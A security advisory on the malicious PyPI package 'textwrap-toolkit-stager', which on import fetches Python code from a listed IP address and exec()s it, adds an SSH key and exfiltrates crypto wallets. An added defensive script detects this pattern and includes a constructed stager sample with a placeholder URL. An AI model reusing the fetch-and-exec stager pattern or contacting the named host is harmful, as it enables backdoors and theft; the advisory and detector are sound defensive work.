Vulnerability
Malicious code in textwrap-toolkit-stager (PyPI)
---

Per source details.

## Source: amazon-inspector (9fc85924d5672f7c91c2dd5e97c46cc48e3ae48084f906b7b0ba9d606c433fa4)

On `import textwrap_toolkit_stager`, the package's `__init__.py` unconditionally fetches Python source from `http://194.5.152.9:8080/hacks/textwrap-toolkit/textwrap_toolkit/__init__.py` via `urllib.request.urlopen` and passes the response bytes directly to `exec(code_bytes, {"__name__": "__main__"})`. The fetch uses a bare IP over plaintext HTTP, with no version pinning, no hash verification, and errors silently swallowed. Any process that imports this package executes attacker-controlled Python code from 194.5.152.9 with the full privileges of the importing user. The package's advertised purpose ('lightweight utility for advanced text wrapping') has no implementation in the shipped code — the module's sole behavior is the remote stager. The package name itself self-describes the intent ('stager').

## Source: kam193 (b5c75bdcf659eb0064e71470edd2140960c88803c906fcc5a4c9ec21b970e887)

During import, the package downloads and executes an obfuscated script. The code then adds a new authorized SSH key and reports back the IP of the current environment. After that, the code also attempts to exfiltrate cryptocurrency wallet data.

---

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-textwrap-toolkit-stager

Reasons (based on the campaign):

- backdoor
- obfuscation
- Downloads and executes a remote malicious script.
- crypto-related
- exfiltration-crypto
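The amazon-inspector description above pins the malicious behaviour to one static pattern: at module top level, data returned by `urllib.request.urlopen()` flows into `exec()`. That pattern is mechanically detectable before a package is ever imported. The script below is an added example written for this record, not code from the package or from either source; it parses a module with Python's `ast` module, tracks which names hold `urlopen()` data, and flags any import-time `exec()`/`eval()` fed by them, while ignoring network calls inside function bodies (which do not run on import). The two sample modules are constructed for the example, and the URL in them is a placeholder, not the advisory's address.

```python
"""Static check for import-time exec()/eval() of urlopen() data (added example)."""
import ast
import sys

# Constructed sample mirroring the stager pattern described in the advisory.
# The URL is a placeholder; nothing here is fetched or executed.
SAMPLE_STAGER = '''
import urllib.request
try:
    resp = urllib.request.urlopen("http://placeholder.invalid/stager.py")
    code_bytes = resp.read()
    exec(code_bytes, {"__name__": "__main__"})
except Exception:
    pass
'''

# Constructed benign sample: urlopen inside a function is not an import-time stager.
SAMPLE_BENIGN = '''
import textwrap
import urllib.request

def wrap(text, width=70):
    return textwrap.wrap(text, width=width)

def fetch(url):
    return urllib.request.urlopen(url).read()
'''


def _is_urlopen(node):
    """True for urlopen(...) called by bare name or as an attribute (urllib.request.urlopen)."""
    return (isinstance(node, ast.Call)
            and ((isinstance(node.func, ast.Name) and node.func.id == "urlopen")
                 or (isinstance(node.func, ast.Attribute) and node.func.attr == "urlopen")))


def _import_time_nodes(tree):
    """Yield every node that executes on import: skip function, lambda and class bodies."""
    stack = list(ast.iter_child_nodes(tree))
    while stack:
        node = stack.pop()
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef, ast.Lambda)):
            continue
        yield node
        stack.extend(ast.iter_child_nodes(node))


def _names_in(node):
    return {n.id for n in ast.walk(node) if isinstance(n, ast.Name)}


def find_remote_exec(source):
    """Return [(lineno, message)] for exec()/eval() whose input comes from urlopen() at import time."""
    tree = ast.parse(source)
    nodes = sorted(_import_time_nodes(tree), key=lambda n: getattr(n, "lineno", 0))

    # Pass 1: names that (transitively) hold data returned by a urlopen() call.
    tainted = set()
    for node in nodes:
        if isinstance(node, ast.Assign):
            if any(_is_urlopen(n) for n in ast.walk(node.value)) or _names_in(node.value) & tainted:
                tainted |= {t.id for t in node.targets if isinstance(t, ast.Name)}
        elif (isinstance(node, ast.withitem) and _is_urlopen(node.context_expr)
                and isinstance(node.optional_vars, ast.Name)):
            tainted.add(node.optional_vars.id)  # with urlopen(...) as resp:

    # Pass 2: exec/eval whose first argument is tainted or wraps urlopen() directly.
    findings = []
    for node in nodes:
        if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id in ("exec", "eval") and node.args):
            arg = node.args[0]
            if any(_is_urlopen(n) for n in ast.walk(arg)) or _names_in(arg) & tainted:
                findings.append((node.lineno, f"{node.func.id}() of urlopen() data at import time"))
    return findings


if __name__ == "__main__":
    # Usage: python check_stager.py path/to/package/__init__.py ...
    targets = sys.argv[1:] or ["<sample stager>", "<sample benign>"]
    for path in targets:
        src = {"<sample stager>": SAMPLE_STAGER, "<sample benign>": SAMPLE_BENIGN}.get(path)
        if src is None:
            with open(path, encoding="utf-8") as fh:
                src = fh.read()
        for lineno, msg in find_remote_exec(src):
            print(f"{path}:{lineno}: {msg}")
```

Run it against the `__init__.py` of every package in a wheel or site-packages directory as a pre-install gate. The check is deliberately syntactic: it catches the plain pattern the advisory describes, and will miss stagers that reach `exec` through aliases, `getattr(builtins, ...)`, or a second-stage decoder, so treat a clean result as "no obvious stager", not as a clean package.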
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs.